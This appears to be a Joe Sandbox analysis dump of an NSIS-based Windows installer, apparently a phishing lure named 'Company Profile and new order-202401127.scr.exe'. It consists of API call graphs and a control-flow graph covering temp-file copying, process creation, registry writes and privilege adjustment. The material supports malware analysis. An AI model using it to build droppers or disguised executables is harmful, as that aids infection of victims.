4456 405110 SendMessageW 4447->4456 4457 4050fc SendMessageW 4447->4457 4448->4436 4463 405388 4448->4463 4475 404edb 4448->4475 4468 4044d5 SendMessageW 4449->4468 4469 4044d5 SendMessageW 4450->4469 4453->4447 4454->4423 4455->4442 4455->4445 4456->4447 4457->4447 4459->4434 4460 405492 4461 40549d InvalidateRect 4460->4461 4464 4054a9 4460->4464 4461->4464 4462 4053b6 SendMessageW 4467 4053cc 4462->4467 4463->4462 4463->4467 4464->4436 4484 404e16 4464->4484 4466 405440 SendMessageW SendMessageW 4466->4467 4467->4460 4467->4466 4468->4459 4469->4429 4471 404eba SendMessageW 4470->4471 4472 404e7e GetMessagePos ScreenToClient SendMessageW 4470->4472 4473 404eb2 4471->4473 4472->4473 4474 404eb7 4472->4474 4473->4446 4474->4471 4487 406521 lstrcpynW 4475->4487 4477 404eee 4488 406468 wsprintfW 4477->4488 4479 404ef8 4480 40140b 2 API calls 4479->4480 4481 404f01 4480->4481 4489 406521 lstrcpynW 4481->4489 4483 404f08 4483->4463 4490 404d4d 4484->4490 4486 404e2b 4486->4436 4487->4477 4488->4479 4489->4483 4491 404d66 4490->4491 4492 40655e 21 API calls 4491->4492 4493 404dca 4492->4493 4494 40655e 21 API calls 4493->4494 4495 404dd5 4494->4495 4496 40655e 21 API calls 4495->4496 4497 404deb lstrlenW wsprintfW SetDlgItemTextW 4496->4497 4497->4486 4498 40248f 4499 402dab 21 API calls 4498->4499 4500 4024a1 4499->4500 4501 402dab 21 API calls 4500->4501 4502 4024ab 4501->4502 4515 402e3b 4502->4515 4505 4024e3 4509 402d89 21 API calls 4505->4509 4511 4024ef 4505->4511 4506 402dab 21 API calls 4508 4024d9 lstrlenW 4506->4508 4507 402933 4508->4505 4509->4511 4510 40250e RegSetValueExW 4512 402524 RegCloseKey 4510->4512 4511->4510 4513 4032b9 39 API calls 4511->4513 4512->4507 4513->4510 4516 402e56 4515->4516 4519 4063bc 4516->4519 4520 4063cb 4519->4520 4521 4024bb 4520->4521 4522 4063d6 RegCreateKeyExW 4520->4522 4521->4505 4521->4506 4521->4507 4522->4521 4523 404610 lstrlenW 4524 404631 WideCharToMultiByte 4523->4524 4525 40462f 4523->4525 4525->4524 4526 402910 4527 402dab 21 API calls 4526->4527 4528 402917 FindFirstFileW 4527->4528 4529 40293f 4528->4529 4532 40292a 4528->4532 4534 406468 wsprintfW 4529->4534 4531 402948 4535 406521 lstrcpynW 4531->4535 4534->4531 4535->4532 4536 401911 4537 401948 4536->4537 4538 402dab 21 API calls 4537->4538 4539 40194d 4538->4539 4540 405c2d 71 API calls 4539->4540 4541 401956 4540->4541 4542 404991 4543 4049bd 4542->4543 4544 4049ce 4542->4544 4603 405b65 GetDlgItemTextW 4543->4603 4545 4049da GetDlgItem 4544->4545 4553 404a39 4544->4553 4547 4049ee 4545->4547 4551 404a02 SetWindowTextW 4547->4551 4556 405e9b 4 API calls 4547->4556 4548 404b1d 4552 404ccc 4548->4552 4605 405b65 GetDlgItemTextW 4548->4605 4549 4049c8 4550 4067cf 5 API calls 4549->4550 4550->4544 4557 4044a0 22 API calls 4551->4557 4555 404507 8 API calls 4552->4555 4553->4548 4553->4552 4558 40655e 21 API calls 4553->4558 4560 404ce0 4555->4560 4561 4049f8 4556->4561 4562 404a1e 4557->4562 4563 404aad SHBrowseForFolderW 4558->4563 4559 404b4d 4564 405ef8 18 API calls 4559->4564 4561->4551 4568 405df0 3 API calls 4561->4568 4565 4044a0 22 API calls 4562->4565 4563->4548 4566 404ac5 CoTaskMemFree 4563->4566 4567 404b53 4564->4567 4569 404a2c 4565->4569 4570 405df0 3 API calls 4566->4570 4606 406521 lstrcpynW 4567->4606 4568->4551 4604 4044d5 SendMessageW 4569->4604 4572 404ad2 4570->4572 4576 404b09 SetDlgItemTextW 4572->4576 4579 40655e 21 API calls 4572->4579 4574 404b6a 4578 406915 5 API calls 4574->4578 4575 404a32 4577 406915 5 API calls 4575->4577 4576->4548 4577->4553 4585 404b71 4578->4585 4580 404af1 lstrcmpiW 4579->4580 4580->4576 4582 404b02 lstrcatW 4580->4582 4581 404bb2 4607 406521 lstrcpynW 4581->4607 4582->4576 4584 404bb9 4586 405e9b 4 API calls 4584->4586 4585->4581 4590 405e3c 2 API calls 4585->4590 4591 404c0a 4585->4591 4587 404bbf GetDiskFreeSpaceW 4586->4587 4589 404be3 MulDiv 4587->4589 4587->4591 4589->4591 4590->4585 4592 404c7b 4591->4592 4594 404e16 24 API calls 4591->4594 4593 404c9e 4592->4593 4596 40140b 2 API calls 4592->4596 4608 4044c2 KiUserCallbackDispatcher 4593->4608 4595 404c68 4594->4595 4597 404c7d SetDlgItemTextW 4595->4597 4598 404c6d 4595->4598 4596->4593 4597->4592 4600 404d4d 24 API calls 4598->4600 4600->4592 4601 404cba 4601->4552 4602 4048ea SendMessageW 4601->4602 4602->4552 4603->4549 4604->4575 4605->4559 4606->4574 4607->4584 4608->4601 4609 401491 4610 4055a6 28 API calls 4609->4610 4611 401498 4610->4611 4612 401914 4613 402dab 21 API calls 4612->4613 4614 40191b 4613->4614 4615 405b81 MessageBoxIndirectW 4614->4615 4616 401924 4615->4616 4617 402896 4618 40289d 4617->4618 4620 402bae 4617->4620 4619 402d89 21 API calls 4618->4619 4621 4028a4 4619->4621 4622 4028b3 SetFilePointer 4621->4622 4622->4620 4623 4028c3 4622->4623 4625 406468 wsprintfW 4623->4625 4625->4620 4626 401f17 4627 402dab 21 API calls 4626->4627 4628 401f1d 4627->4628 4629 402dab 21 API calls 4628->4629 4630 401f26 4629->4630 4631 402dab 21 API calls 4630->4631 4632 401f2f 4631->4632 4633 402dab 21 API calls 4632->4633 4634 401f38 4633->4634 4635 401423 28 API calls 4634->4635 4636 401f3f 4635->4636 4643 405b47 ShellExecuteExW 4636->4643 4638 401f87 4639 402933 4638->4639 4640 4069c0 5 API calls 4638->4640 4641 401fa4 CloseHandle 4640->4641 4641->4639 4643->4638 4644 402f98 4645 402faa SetTimer 4644->4645 4647 402fc3 4644->4647 4645->4647 4646 403018 4647->4646 4648 402fdd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4647->4648 4648->4646 4649 40551a 4650 40552a 4649->4650 4651 40553e 4649->4651 4652 405530 4650->4652 4653 405587 4650->4653 4654 405546 IsWindowVisible 4651->4654 4660 40555d 4651->4660 4656 4044ec SendMessageW 4652->4656 4655 40558c CallWindowProcW 4653->4655 4654->4653 4657 405553 4654->4657 4658 40553a 4655->4658 4656->4658 4659 404e5b 5 API calls 4657->4659 4659->4660 4660->4655 4661 404edb 4 API calls 4660->4661 4661->4653 4662 401d1c 4663 402d89 21 API calls 4662->4663 4664 401d22 IsWindow 4663->4664 4665 401a25 4664->4665 4666 40149e 4667 4014ac PostQuitMessage 4666->4667 4668 4023a2 4666->4668 4667->4668 3207 401ba0 3208 401bf1 3207->3208 3209 401bad 3207->3209 3211 401bf6 3208->3211 3212 401c1b GlobalAlloc 3208->3212 3210 401c36 3209->3210 3215 401bc4 3209->3215 3213 40655e 21 API calls 3210->3213 3221 4023a2 3210->3221 3211->3221 3245 406521 lstrcpynW 3211->3245 3226 40655e 3212->3226 3216 40239c 3213->3216 3243 406521 lstrcpynW 3215->3243 3246 405b81 3216->3246 3219 401c08 GlobalFree 3219->3221 3220 401bd3 3244 406521 lstrcpynW 3220->3244 3224 401be2 3250 406521 lstrcpynW 3224->3250 3241 406569 3226->3241 3227 4067b0 3228 4067c9 3227->3228 3273 406521 lstrcpynW 3227->3273 3228->3210 3230 406781 lstrlenW 3230->3241 3234 40667a GetSystemDirectoryW 3234->3241 3235 40655e 15 API calls 3235->3230 3236 406690 GetWindowsDirectoryW 3236->3241 3237 40655e 15 API calls 3237->3241 3238 406722 lstrcatW 3238->3241 3241->3227 3241->3230 3241->3234 3241->3235 3241->3236 3241->3237 3241->3238 3242 4066f2 SHGetPathFromIDListW CoTaskMemFree 3241->3242 3251 4063ef 3241->3251 3256 406915 GetModuleHandleA 3241->3256 3262 4067cf 3241->3262 3271 406468 wsprintfW 3241->3271 3272 406521 lstrcpynW 3241->3272 3242->3241 3243->3220 3244->3224 3245->3219 3247 405b96 3246->3247 3248 405be2 3247->3248 3249 405baa MessageBoxIndirectW 3247->3249 3248->3221 3249->3248 3250->3221 3274 40638e 3251->3274 3254 406423 RegQueryValueExW RegCloseKey 3255 406453 3254->3255 3255->3241 3257 406931 3256->3257 3258 40693b GetProcAddress 3256->3258 3278 4068a5 GetSystemDirectoryW 3257->3278 3260 40694a 3258->3260 3260->3241 3261 406937 3261->3258 3261->3260 3269 4067dc 3262->3269 3263 406857 CharPrevW 3267 406852 3263->3267 3264 406845 CharNextW 3264->3267 3264->3269 3265 406878 3265->3241 3267->3263 3267->3265 3268 406831 CharNextW 3268->3269 3269->3264 3269->3267 3269->3268 3270 406840 CharNextW 3269->3270 3281 405e1d 3269->3281 3270->3264 3271->3241 3272->3241 3273->3228 3275 40639d 3274->3275 3276 4063a1 3275->3276 3277 4063a6 RegOpenKeyExW 3275->3277 3276->3254 3276->3255 3277->3276 3279 4068c7 wsprintfW LoadLibraryExW 3278->3279 3279->3261 3282 405e23 3281->3282 3283 405e39 3282->3283 3284 405e2a CharNextW 3282->3284 3283->3269 3284->3282 3301 403fa1 3302 403fb9 3301->3302 3303 40411a 3301->3303 3302->3303 3304 403fc5 3302->3304 3305 40412b GetDlgItem GetDlgItem 3303->3305 3310 40416b 3303->3310 3307 403fd0 SetWindowPos 3304->3307 3308 403fe3 3304->3308 3309 4044a0 22 API calls 3305->3309 3306 4041c5 3366 404115 3306->3366 3374 4044ec 3306->3374 3307->3308 3312 403fec ShowWindow 3308->3312 3313 40402e 3308->3313 3314 404155 SetClassLongW 3309->3314 3310->3306 3315 401389 2 API calls 3310->3315 3316 404107 3312->3316 3317 40400c GetWindowLongW 3312->3317 3318 404036 DestroyWindow 3313->3318 3319 40404d 3313->3319 3320 40140b 2 API calls 3314->3320 3323 40419d 3315->3323 3396 404507 3316->3396 3317->3316 3325 404025 ShowWindow 3317->3325 3329 404429 3318->3329 3321 404052 SetWindowLongW 3319->3321 3322 404063 3319->3322 3320->3310 3321->3366 3322->3316 3326 40406f GetDlgItem 3322->3326 3323->3306 3327 4041a1 SendMessageW 3323->3327 3325->3313 3331 404080 SendMessageW IsWindowEnabled 3326->3331 3332 40409d 3326->3332 3327->3366 3328 40140b 2 API calls 3345 4041d7 3328->3345 3333 40445a ShowWindow 3329->3333 3329->3366 3330 40442b DestroyWindow EndDialog 3330->3329 3331->3332 3331->3366 3335 4040aa 3332->3335 3337 4040f1 SendMessageW 3332->3337 3338 4040bd 3332->3338 3347 4040a2 3332->3347 3333->3366 3334 40655e 21 API calls 3334->3345 3335->3337 3335->3347 3337->3316 3340 4040c5 3338->3340 3341 4040da 3338->3341 3339 4040d8 3339->3316 3390 40140b 3340->3390 3343 40140b 2 API calls 3341->3343 3342 4044a0 22 API calls 3342->3345 3346 4040e1 3343->3346 3345->3328 3345->3330 3345->3334 3345->3342 3364 40436b DestroyWindow 3345->3364 3345->3366 3377 4044a0 3345->3377 3346->3316 3346->3347 3393 404479 3347->3393 3349 404252 GetDlgItem 3350 404267 3349->3350 3351 40426f ShowWindow KiUserCallbackDispatcher 3349->3351 3350->3351 3380 4044c2 KiUserCallbackDispatcher 3351->3380 3353 404299 EnableWindow 3358 4042ad 3353->3358 3354 4042b2 GetSystemMenu EnableMenuItem SendMessageW 3355 4042e2 SendMessageW 3354->3355 3354->3358 3355->3358 3358->3354 3381 4044d5 SendMessageW 3358->3381 3382 403f82 3358->3382 3385 406521 lstrcpynW 3358->3385 3360 404311 lstrlenW 3361 40655e 21 API calls 3360->3361 3362 404327 SetWindowTextW 3361->3362 3386 401389 3362->3386 3364->3329 3365 404385 CreateDialogParamW 3364->3365 3365->3329 3367 4043b8 3365->3367 3368 4044a0 22 API calls 3367->3368 3369 4043c3 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3368->3369 3370 401389 2 API calls 3369->3370 3371 404409 3370->3371 3371->3366 3372 404411 ShowWindow 3371->3372 3373 4044ec SendMessageW 3372->3373 3373->3329 3375 404504 3374->3375 3376 4044f5 SendMessageW 3374->3376 3375->3345 3376->3375 3378 40655e 21 API calls 3377->3378 3379 4044ab SetDlgItemTextW 3378->3379 3379->3349 3380->3353 3381->3358 3383 40655e 21 API calls 3382->3383 3384 403f90 SetWindowTextW 3383->3384 3384->3358 3385->3360 3388 401390 3386->3388 3387 4013fe 3387->3345 3388->3387 3389 4013cb MulDiv SendMessageW 3388->3389 3389->3388 3391 401389 2 API calls 3390->3391 3392 401420 3391->3392 3392->3347 3394 404480 3393->3394 3395 404486 SendMessageW 3393->3395 3394->3395 3395->3339 3397 4045ca 3396->3397 3398 40451f GetWindowLongW 3396->3398 3397->3366 3398->3397 3399 404534 3398->3399 3399->3397 3400 404561 GetSysColor 3399->3400 3401 404564 3399->3401 3400->3401 3402 404574 SetBkMode 3401->3402 3403 40456a SetTextColor 3401->3403 3404 404592 3402->3404 3405 40458c GetSysColor 3402->3405 3403->3402 3406 4045a3 3404->3406 3407 404599 SetBkColor 3404->3407 3405->3404 3406->3397 3408 4045b6 DeleteObject 3406->3408 3409 4045bd CreateBrushIndirect 3406->3409 3407->3406 3408->3409 3409->3397 4669 402621 4670 402dab 21 API calls 4669->4670 4671 402628 4670->4671 4674 406011 GetFileAttributesW CreateFileW 4671->4674 4673 402634 4674->4673 4682 4025a3 4692 402deb 4682->4692 4685 402d89 21 API calls 4686 4025b6 4685->4686 4687 402933 4686->4687 4688 4025d2 RegEnumKeyW 4686->4688 4689 4025de RegEnumValueW 4686->4689 4690 4025f3 RegCloseKey 4688->4690 4689->4690 4690->4687 4693 402dab 21 API calls 4692->4693 4694 402e02 4693->4694 4695 40638e RegOpenKeyExW 4694->4695 4696 4025ad 4695->4696 4696->4685 4697 4015a8 4698 402dab 21 API calls 4697->4698 4699 4015af SetFileAttributesW 4698->4699 4700 4015c1 4699->4700 3742 401fa9 3743 402dab 21 API calls 3742->3743 3744 401faf 3743->3744 3745 4055a6 28 API calls 3744->3745 3746 401fb9 3745->3746 3757 405b04 CreateProcessW 3746->3757 3749 401fe2 CloseHandle 3752 402933 3749->3752 3753 401fd4 3754 401fe4 3753->3754 3755 401fd9 3753->3755 3754->3749 3765 406468 wsprintfW 3755->3765 3758 401fbf 3757->3758 3759 405b37 CloseHandle 3757->3759 3758->3749 3758->3752 3760 4069c0 WaitForSingleObject 3758->3760 3759->3758 3761 4069da 3760->3761 3762 4069ec GetExitCodeProcess 3761->3762 3766 406951 3761->3766 3762->3753 3765->3749 3767 40696e PeekMessageW 3766->3767 3768 406964 DispatchMessageW 3767->3768 3769 40697e WaitForSingleObject 3767->3769 3768->3767 3769->3761 4701 40202f 4702 402dab 21 API calls 4701->4702 4703 402036 4702->4703 4704 406915 5 API calls 4703->4704 4705 402045 4704->4705 4706 402061 GlobalAlloc 4705->4706 4707 4020d1 4705->4707 4706->4707 4708 402075 4706->4708 4709 406915 5 API calls 4708->4709 4710 40207c 4709->4710 4711 406915 5 API calls 4710->4711 4712 402086 4711->4712 4712->4707 4716 406468 wsprintfW 4712->4716 4714 4020bf 4717 406468 wsprintfW 4714->4717 4716->4714 4717->4707 4718 40252f 4719 402deb 21 API calls 4718->4719 4720 402539 4719->4720 4721 402dab 21 API calls 4720->4721 4722 402542 4721->4722 4723 40254d RegQueryValueExW 4722->4723 4725 402933 4722->4725 4724 40256d 4723->4724 4726 402573 RegCloseKey 4723->4726 4724->4726 4729 406468 wsprintfW 4724->4729 4726->4725 4729->4726 4730 4021af 4731 402dab 21 API calls 4730->4731 4732 4021b6 4731->4732 4733 402dab 21 API calls 4732->4733 4734 4021c0 4733->4734 4735 402dab 21 API calls 4734->4735 4736 4021ca 4735->4736 4737 402dab 21 API calls 4736->4737 4738 4021d4 4737->4738 4739 402dab 21 API calls 4738->4739 4740 4021de 4739->4740 4741 40221d CoCreateInstance 4740->4741 4742 402dab 21 API calls 4740->4742 4745 40223c 4741->4745 4742->4741 4743 401423 28 API calls 4744 4022fb 4743->4744 4745->4743 4745->4744 4746 403bb1 4747 403bbc 4746->4747 4748 403bc0 4747->4748 4749 403bc3 GlobalAlloc 4747->4749 4749->4748 4757 401a35 4758 402dab 21 API calls 4757->4758 4759 401a3e ExpandEnvironmentStringsW 4758->4759 4760 401a52 4759->4760 4761 401a65 4759->4761 4760->4761 4762 401a57 lstrcmpW 4760->4762 4762->4761 3727 4023b7 3728 4023bf 3727->3728 3733 4023c5 3727->3733 3729 402dab 21 API calls 3728->3729 3729->3733 3730 402dab 21 API calls 3732 4023d3 3730->3732 3731 4023e1 3735 402dab 21 API calls 3731->3735 3732->3731 3734 402dab 21 API calls 3732->3734 3733->3730 3733->3732 3734->3731 3736 4023ea WritePrivateProfileStringW 3735->3736 4768 4014b8 4769 4014be 4768->4769 4770 401389 2 API calls 4769->4770 4771 4014c6 4770->4771 4772 402439 4773 402441 4772->4773 4774 40246c 4772->4774 4776 402deb 21 API calls 4773->4776 4775 402dab 21 API calls 4774->4775 4778 402473 4775->4778 4777 402448 4776->4777 4780 402dab 21 API calls 4777->4780 4782 402480 4777->4782 4783 402e69 4778->4783 4781 402459 RegDeleteValueW RegCloseKey 4780->4781 4781->4782 4784 402e7d 4783->4784 4786 402e76 4783->4786 4784->4786 4787 402eae 4784->4787 4786->4782 4788 40638e RegOpenKeyExW 4787->4788 4789 402edc 4788->4789 4790 402eec RegEnumValueW 4789->4790 4791 402f0f 4789->4791 4798 402f86 4789->4798 4790->4791 4792 402f76 RegCloseKey 4790->4792 4791->4792 4793 402f4b RegEnumKeyW 4791->4793 4794 402f54 RegCloseKey 4791->4794 4796 402eae 6 API calls 4791->4796 4792->4798 4793->4791 4793->4794 4795 406915 5 API calls 4794->4795 4797 402f64 4795->4797 4796->4791 4797->4798 4799 402f68 RegDeleteKeyW 4797->4799 4798->4786 4799->4798 4800 40173a 4801 402dab 21 API calls 4800->4801 4802 401741 SearchPathW 4801->4802 4803 40175c 4802->4803 4804 401d3d 4805 402d89 21 API calls 4804->4805 4806 401d44 4805->4806 4807 402d89 21 API calls 4806->4807 4808 401d50 GetDlgItem 4807->4808 4809 40263d 4808->4809 4810 406c3f 4812 406ac3 4810->4812 4811 40742e 4812->4811 4813 406b44 GlobalFree 4812->4813 4814 406b4d GlobalAlloc 4812->4814 4815 406bc4 GlobalAlloc 4812->4815 4816 406bbb GlobalFree 4812->4816 4813->4814 4814->4811 4814->4812 4815->4811 4815->4812 4816->4815

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 4034fc-40354e SetErrorMode GetVersionExW 1 403550-403580 GetVersionExW 0->1 2 403588-40358d 0->2 1->2 3 403595-4035d7 2->3 4 40358f 2->4 5 4035d9-4035e1 call 406915 3->5 6 4035ea 3->6 4->3 5->6 11 4035e3 5->11 8 4035ef-403603 call 4068a5 lstrlenA 6->8 13 403605-403621 call 406915 * 3 8->13 11->6 20 403632-403696 #17 OleInitialize SHGetFileInfoW call 406521 GetCommandLineW call 406521 13->20 21 403623-403629 13->21 28 403698-40369a 20->28 29 40369f-4036b3 call 405e1d CharNextW 20->29 21->20 25 40362b 21->25 25->20 28->29 32 4037ae-4037b4 29->32 33 4036b8-4036be 32->33 34 4037ba 32->34 35 4036c0-4036c5 33->35 36 4036c7-4036ce 33->36 37 4037ce-4037e8 GetTempPathW call 4034cb 34->37 35->35 35->36 38 4036d0-4036d5 36->38 39 4036d6-4036da 36->39 47 403840-40385a DeleteFileW call 403082 37->47 48 4037ea-403808 GetWindowsDirectoryW lstrcatW call 4034cb 37->48 38->39 41 4036e0-4036e6 39->41 42 40379b-4037aa call 405e1d 39->42 45 403700-403739 41->45 46 4036e8-4036ef 41->46 42->32 59 4037ac-4037ad 42->59 54 403756-403790 45->54 55 40373b-403740 45->55 52 4036f1-4036f4 46->52 53 4036f6 46->53 64 403860-403866 47->64 65 403a47-403a57 call 403b19 OleUninitialize 47->65 48->47 62 40380a-40383a GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034cb 48->62 52->45 52->53 53->45 57 403792-403796 54->57 58 403798-40379a 54->58 55->54 61 403742-40374a 55->61 57->58 63 4037bc-4037c9 call 406521 57->63 58->42 59->32 66 403751 61->66 67 40374c-40374f 61->67 62->47 62->65 63->37 70 40386c-403877 call 405e1d 64->70 71 4038ff-403906 call 403bf3 64->71 77 403a59-403a69 call 405b81 ExitProcess 65->77 78 403a7d-403a83 65->78 66->54 67->54 67->66 82 4038c5-4038cf 70->82 83 403879-4038ae 70->83 80 40390b-40390f 71->80 84 403b01-403b09 78->84 85 403a85-403a9b GetCurrentProcess OpenProcessToken 78->85 80->65 86 4038d1-4038df call 405ef8 82->86 87 403914-40393a call 405aec lstrlenW call 406521 82->87 91 4038b0-4038b4 83->91 88 403b0b 84->88 89 403b0f-403b13 ExitProcess 84->89 92 403ad1-403adf call 406915 85->92 93 403a9d-403acb LookupPrivilegeValueW AdjustTokenPrivileges 85->93 86->65 106 4038e5-4038fb call 406521 * 2 86->106 110 40394b-403963 87->110 111 40393c-403946 call 406521 87->111 88->89 97 4038b6-4038bb 91->97 98 4038bd-4038c1 91->98 104 403ae1-403aeb 92->104 105 403aed-403af8 ExitWindowsEx 92->105 93->92 97->98 99 4038c3 97->99 98->91 98->99 99->82 104->105 108 403afa-403afc call 40140b 104->108 105->84 105->108 106->71 108->84 116 403968-40396c 110->116 111->110 118 403971-40399b wsprintfW call 40655e 116->118 122 4039a4 call 405acf 118->122 123 40399d-4039a2 call 405a75 118->123 127 4039a9-4039ab 122->127 123->127 128 4039e7-403a06 SetCurrentDirectoryW call 4062e1 CopyFileW 127->128 129 4039ad-4039b7 GetFileAttributesW 127->129 137 403a45 128->137 138 403a08-403a29 call 4062e1 call 40655e call 405b04 128->138 130 4039d8-4039e3 129->130 131 4039b9-4039c2 DeleteFileW 129->131 130->116 134 4039e5 130->134 131->130 133 4039c4-4039d6 call 405c2d 131->133 133->118 133->130 134->65 137->65 146 403a2b-403a35 138->146 147 403a6f-403a7b CloseHandle 138->147 146->137 148 403a37-403a3f call 40687e 146->148 147->137 148->118 148->137
                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE ref: 0040351F
                                                                                            • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040354A
                                                                                            • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040355D
                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 004035F6
                                                                                            • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403633
                                                                                            • OleInitialize.OLE32(00000000), ref: 0040363A
                                                                                            • SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403659
                                                                                            • GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040366E
                                                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe",00000020,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036A7
                                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037DF
                                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037F0
                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037FC
                                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403818
                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403829
                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403831
                                                                                            • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403845
                                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040391E
                                                                                              • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                                                            • wsprintfW.USER32 ref: 0040397B
                                                                                            • GetFileAttributesW.KERNEL32( ",C:\Users\user\AppData\Local\Temp\), ref: 004039AE
                                                                                            • DeleteFileW.KERNEL32( "), ref: 004039BA
                                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004039E8
                                                                                              • Part of subcall function 004062E1: MoveFileExW.KERNEL32(?,?,00000005,00405DDF,?,00000000,000000F1,?,?,?,?,?), ref: 004062EB
                                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe, ",00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004039FE
                                                                                              • Part of subcall function 00405B04: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?, ",?), ref: 00405B2D
                                                                                              • Part of subcall function 00405B04: CloseHandle.KERNEL32(?,?,?, ",?), ref: 00405B3A
                                                                                              • Part of subcall function 0040687E: FindFirstFileW.KERNELBASE(75923420,00425F58,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,00405F41,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                                                                              • Part of subcall function 0040687E: FindClose.KERNEL32(00000000), ref: 00406895
                                                                                            • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A4C
                                                                                            • ExitProcess.KERNEL32 ref: 00403A69
                                                                                            • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?, ",00000000), ref: 00403A70
                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A8C
                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403A93
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA8
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403ACB
                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AF0
                                                                                            • ExitProcess.KERNEL32 ref: 00403B13
                                                                                              • Part of subcall function 00405ACF: CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
